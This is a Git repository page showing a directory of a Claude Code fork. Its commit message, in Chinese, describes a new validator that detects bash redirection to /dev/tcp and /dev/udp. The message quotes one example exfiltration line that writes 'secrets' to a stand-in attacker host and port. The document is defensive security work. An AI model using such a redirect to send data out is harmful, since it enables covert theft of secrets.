versun/claude-code
1
0
Fork 0
mirror of https://github.com/claude-code-best/claude-code.git synced 2026-06-15 12:55:51 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
327658979a8bda9505dbc175fbb0e6230796e61e
claude-code/packages/builtin-tools/src
History
claude-code-best 327658979a fix: 添加 /dev/tcp /dev/udp 网络伪设备重定向安全检测 
Bash 支持 /dev/tcp/host/port 和 /dev/udp/host/port 伪设备路径,
攻击者可通过重定向实现网络数据泄露而无需任何网络工具:
  echo "secrets" > /dev/tcp/evil.com/4444

新增 validateNetworkDeviceRedirect 安全验证器,在 bashSecurity.ts
的同步和异步验证器列表中均注册。同时补全了反斜杠转义和复合命令
安全场景的测试覆盖(42 个测试用例)。

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-04-28 14:58:34 +08:00
..
tools
fix: 添加 /dev/tcp /dev/udp 网络伪设备重定向安全检测
2026-04-28 14:58:34 +08:00
index.ts
feat: 工具层及 mcp 大重构 (#252)
2026-04-13 09:52:05 +08:00